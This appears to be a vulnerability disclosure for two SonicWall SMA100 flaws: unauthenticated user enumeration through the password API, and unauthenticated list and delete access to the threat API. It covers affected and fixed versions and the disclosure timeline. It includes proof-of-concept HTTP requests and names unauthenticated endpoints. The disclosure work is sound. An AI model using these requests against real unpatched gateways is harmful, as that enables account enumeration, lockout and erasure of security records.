During a customer engagement we identified multiple vulnerabilities in SonicWall’s Mobile Access web interface (SMA) allowing unauthenticated user enumeration and unauthenticated read/delete access to several endpoints of the management API. SMA is described as such by SonicWall:
“SonicWall Secure Mobile Access (SMA) is a unified secure access gateway that enables organizations to provide access to any application, anytime, from anywhere and any devices, including managed and unmanaged.”
CVEs registered
CVE-2021-20049[1]: SONICWALL SMA100 API username enumeration vulnerability
CVE-2021-20050[2]: SMA100 improper access control vulnerability allowed restricted management APIS accessible
Affected versions and platforms
SMA 100 Series
(SMA 200, 210, 400, 410, 500v)
SMA100 firmware 10.2.1.2-24sv and earlier
SMA100 firmware 10.2.0.8-37sv and earlier
Fixed versions
10.2.0.9-41sv
10.2.1.3-27sv
Timeline
21/09/2021: Vulnerabilities reported to SonicWall’s PSIRT
28/09/2021: SonicWall has reviewed and validated reported vulnerabilities and confirmed the findings. They stated they “will begin remediation efforts with our development and engineering teams”.
21/12/2021: SonicWall release fixed versions for SMA and publish associated advisories.
CVE-2021-20049: User enumeration
Description
It was possible to enumerate valid users by using the change password API endpoint located at "/__api__/v1/password". If the password was guessed, it was then possible to change it to an arbitrary one. On the instance we had access to, it allowed us to list users of several domains, one which was likely an internal Active Directory (AD) domain.
There were several problems here:
The API was reachable by an unauthenticated user
The response message was not generic, allowing one to enumerate users
Proof of Concept
An HTTP request to a non-existing user:
POST /__api__/v1/password HTTP/1.1 Host: X.X.X.X Content-Type: application/json
{ "userName": "nonexistinguser", "domainName": "SOMEDOMAIN", "oldPasswd": "password123", "newPasswd":"pwned" } Returned an HTTP response as below:
HTTP/1.1 200 OK Content-Length: 170 {"status": "failure", "messageToken": "SMA_PASSWORD_CHANGE_ERROR_AD_DEFAULT", "defaultMessage": "kerberos_change_password error code {0}", "messageValues": "-1765328378"} While a request to an existing one:
POST /__api__/v1/password HTTP/1.1 Host: X.X.X.X Content-Type: application/json { "userName": "existinguser", "domainName": "SOMEDOMAIN", "oldPasswd": "password123", "newPasswd":"pwned" }
Returned an HTTP response as below:
HTTP/1.1 200 OK Content-Length: 174 {"status": "failure", "messageToken": "SMA_PASSWORD_CHANGE_ERROR_AUTH_FAILED", "defaultMessage": "Password change failed - Old password is incorrect.", "messageValues": null} Note the Kerberos error on a non-existing user that allowed an unauthenticated attacker to remotely enumerate internal Active Directory users from the internet.
If the password-changing feature and the AD configuration possess a threshold on failed attempts, it would also be possible to lock accounts (not tested).
CVE-2021-20050: Improper access control
Description
It was possible to access several endpoints of the threat API described at https://<somedomain>/threat/__api__/v1/doc.json such as:
https://<somedomain>/threat/__api__/v1/authhttps://<somedomain>/threat/__api__/v1/fileshttps://<somedomain>/threat/__api__/v1/access
Allowing us to both list and delete what they contained.
This can be used to figure out usernames, delete unsuccessful attempts to login, list and delete upload malicious files records etc.
Proof of Concept
Open a browser and visit the above listed API endpoints:
